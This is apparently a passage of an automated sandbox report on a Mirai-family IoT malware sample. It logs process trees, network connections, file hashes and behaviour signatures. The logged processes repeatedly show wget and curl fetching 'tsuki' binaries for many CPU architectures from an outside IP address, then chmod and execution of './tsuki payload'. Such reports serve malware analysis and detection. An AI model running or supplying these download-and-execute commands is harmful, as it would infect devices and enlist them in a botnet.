[wget http://176.123.2.219/bins/tsuki.arm7]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm7]
/bin/cat
[cat tsuki.arm7]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.ppc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.ppc]
/bin/cat
[cat tsuki.ppc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.m68k]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.m68k]
/bin/cat
[cat tsuki.m68k]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.spc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.spc]
/bin/cat
[cat tsuki.spc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.i686]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.i686]
/bin/cat
[cat tsuki.i686]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.sh4]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.sh4]
/bin/cat
[cat tsuki.sh4]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arc]
/bin/cat
[cat tsuki.arc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
Network
| Country | Destination | Domain | Proto |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
Files
/tmp/tsuki.x86
| MD5 | f60ada8b79c2232773b9c08868c1c5fb |
| SHA1 | 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa |
| SHA256 | 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117 |
| SHA512 | 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8 |
/tmp/tsuki
| MD5 | 6cf78b3572c325d809ad4677c2ebd6a2 |
| SHA1 | be2f27c2b001f981344e52333568cb0dc7ffe7ad |
| SHA256 | c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0 |
| SHA512 | bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24 |
/tmp/tsuki
| MD5 | 2cf4b7e9a6fa11dbff627fc7aeee3f97 |
| SHA1 | 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb |
| SHA256 | eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d |
| SHA512 | 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57 |
/tmp/tsuki
| MD5 | 3cd8418ac8f414def6727fe141d328b9 |
| SHA1 | dc61b74e9e08ff3208ee96a6c94f8247e6196b99 |
| SHA256 | cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3 |
| SHA512 | 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9 |
/tmp/tsuki
| MD5 | eeed291445ee3e6bac53540dfd6cd91c |
| SHA1 | afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41 |
| SHA256 | 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78 |
| SHA512 | ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283 |
/tmp/tsuki
| MD5 | adf30c84e4d1a741bb51593fa750d624 |
| SHA1 | ca52225d16c403e9e6ab662e8dab63496281945d |
| SHA256 | 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806 |
| SHA512 | 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-22 00:17
Reported
2024-07-22 00:20
Platform
debian9-mipsbe-20240418-en
Max time kernel
87s
Max time network
90s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki | /tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/curl | N/A |
Processes
/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
[/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.x86]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.x86]
/bin/cat
[cat tsuki.x86]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mips]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mips]
/bin/cat
[cat tsuki.mips]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.mips tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mpsl]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mpsl]
/bin/cat
[cat tsuki.mpsl]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm]
/bin/cat
[cat tsuki.arm]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm5]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm5]
/bin/cat
[cat tsuki.arm5]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm6]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm6]
/bin/cat
[cat tsuki.arm6]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm7]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm7]
/bin/cat
[cat tsuki.arm7]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.ppc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.ppc]
/bin/cat
[cat tsuki.ppc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.m68k]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.m68k]
/bin/cat
[cat tsuki.m68k]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.spc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.spc]
/bin/cat
[cat tsuki.spc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.i686]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.i686]
/bin/cat
[cat tsuki.i686]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.sh4]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.sh4]
/bin/cat
[cat tsuki.sh4]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arc]
/bin/cat
[cat tsuki.arc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
Network
| Country | Destination | Domain | Proto |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
Files
/tmp/tsuki.x86
| MD5 | f60ada8b79c2232773b9c08868c1c5fb |
| SHA1 | 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa |
| SHA256 | 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117 |
| SHA512 | 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8 |
/tmp/tsuki
| MD5 | 6cf78b3572c325d809ad4677c2ebd6a2 |
| SHA1 | be2f27c2b001f981344e52333568cb0dc7ffe7ad |
| SHA256 | c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0 |
| SHA512 | bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24 |
/tmp/tsuki
| MD5 | 2cf4b7e9a6fa11dbff627fc7aeee3f97 |
| SHA1 | 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb |
| SHA256 | eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d |
| SHA512 | 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57 |
/tmp/tsuki
| MD5 | 3cd8418ac8f414def6727fe141d328b9 |
| SHA1 | dc61b74e9e08ff3208ee96a6c94f8247e6196b99 |
| SHA256 | cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3 |
| SHA512 | 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9 |
/tmp/tsuki
| MD5 | eeed291445ee3e6bac53540dfd6cd91c |
| SHA1 | afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41 |
| SHA256 | 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78 |
| SHA512 | ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283 |
/tmp/tsuki
| MD5 | adf30c84e4d1a741bb51593fa750d624 |
| SHA1 | ca52225d16c403e9e6ab662e8dab63496281945d |
| SHA256 | 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806 |
| SHA512 | 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-22 00:17
Reported
2024-07-22 00:19
Platform
debian9-mipsel-20240611-en
Max time kernel
48s
Max time network
50s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki | /tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.spc | /usr/bin/curl | N/A |
Processes
/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
[/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.x86]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.x86]
/bin/cat
[cat tsuki.x86]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-c985af6e81ad42d18f9a4e3b7f1a966c-systemd-timedated.service-t4QlXg tsuki tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mips]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mips]
/bin/cat
[cat tsuki.mips]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-c985af6e81ad42d18f9a4e3b7f1a966c-systemd-timedated.service-t4QlXg tsuki tsuki.mips tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mpsl]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mpsl]
/bin/cat
[cat tsuki.mpsl]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-c985af6e81ad42d18f9a4e3b7f1a966c-systemd-timedated.service-t4QlXg tsuki tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm]
/bin/cat
[cat tsuki.arm]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-c985af6e81ad42d18f9a4e3b7f1a966c-systemd-timedated.service-t4QlXg tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm5]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm5]
/bin/cat
[cat tsuki.arm5]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-c985af6e81ad42d18f9a4e3b7f1a966c-systemd-timedated.service-t4QlXg tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm6]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm6]
/bin/cat
[cat tsuki.arm6]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-c985af6e81ad42d18f9a4e3b7f1a966c-systemd-timedated.service-t4QlXg tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm7]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm7]
/bin/cat
[cat tsuki.arm7]
/bin/chmod
